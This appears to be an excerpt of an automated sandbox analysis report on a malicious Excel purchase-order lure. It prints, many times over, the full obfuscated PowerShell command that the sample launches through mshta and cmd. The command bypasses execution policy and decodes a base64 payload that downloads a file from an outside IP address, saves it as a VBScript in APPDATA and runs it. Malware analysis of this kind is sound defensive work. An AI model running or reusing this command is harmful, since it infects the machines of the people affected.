File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

PowerShell case anomaly found

Source:	Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

Source: PO#BBGR2411PO69.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
